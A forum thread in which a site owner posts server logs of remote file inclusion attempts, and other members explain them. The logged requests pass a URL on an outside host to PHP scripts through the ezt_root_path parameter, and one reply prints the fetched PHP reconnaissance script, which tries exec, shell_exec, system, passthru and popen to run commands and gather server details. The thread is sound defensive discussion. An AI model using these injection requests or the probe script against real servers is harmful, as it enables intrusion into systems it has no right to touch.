Am i being hacked and what are they doing?

chucklechuck

Registered Member
Dec 2, 2008
93
53
Not being too up on hacking i don't really know what this all means but doesn't look good. Anybody have any advice?

Thanks in advance
Code:
 72.55.176.232 more info
,

vm-weblinux01.axialdev.net
Mozilla/3.0 (OS/2; U)
December 25, 2008 12:40:46
	
/golf-gift/golf-tickets//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:46
	
/golf-gift//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:46
	
//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:57
	
/golf-gift/golf-tickets//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:57
	
//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:57
	
/golf-gift//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
 
At a guess thats a script running against your server hoping that you have one of the applications its testing for installed.

It appears that they are trying to download idefell.txt down onto your box. The file contains:

Code:
<?php
//FeeLCoMz Response
$pwd1 =	@getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 =	@getenv("SERVER_SOFTWARE");
$php1 =	@phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1=	@diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used =	ConvertBytes($all1-$free1);
$free =	ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

echo "FeeLCoMz".$sf."<br>";
echo "uname -a:	$un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:	$sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

function ConvertBytes($number) {
  $len = strlen($number);
  if($len < 4) { return sprintf("%d b", $number); }
  if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
  if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
  return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if(function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("n",$res);
    } elseif(function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;

?>

which is getting various things suck as PHP version, whether safe mode is on and whether the script can run system commands (such as exec / passthru).

It may be a script to check to see what else the hacker could run if that script successfully got on your box.

May be worth scanning your server to see if that file is on there anywhere.
 
thanks for response. Checked files stored and can't see anything new but this is hosted on a shared hostgator server. Will keep my eye out anyway.
 
Its probably just an automated scan that is going across the IP range you are on :)
Ley Hostgator worry about the backend ;)
 
Back
Top
AdBlock Detected

We get it, advertisements are annoying!

Sure, ad-blocking software does a great job at blocking ads, but it also blocks useful features and essential functions on BlackHatWorld and other forums. These functions are unrelated to ads, such as internal links and images. For the best site experience please disable your AdBlocker.

I've Disabled AdBlock